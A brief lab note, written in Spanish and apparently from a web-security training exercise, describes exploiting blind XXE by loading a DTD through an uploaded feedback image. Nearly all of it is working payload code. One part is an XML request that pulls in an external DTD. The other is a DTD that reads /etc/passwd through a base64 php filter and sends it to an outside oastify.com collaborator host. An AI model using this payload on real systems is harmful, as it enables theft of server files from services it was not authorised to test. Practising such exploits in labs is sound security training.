6 - Exploiting blind XXE to retrieve data via error messages

La idea va a ser cargar un DTD desde la foto que podemos subir al endpoint de feedback.

Payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://localhost:40817/feedback/screenshots/3.xml"> %xxe; ]>
<stockCheck><productId>2</productId><storeId>1</storeId></stockCheck>

DTD:

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://7aitci4d6zry15ur9565w6tvxm3drbf0.oastify.com/?x=%file;'>">
%eval;
%exfil;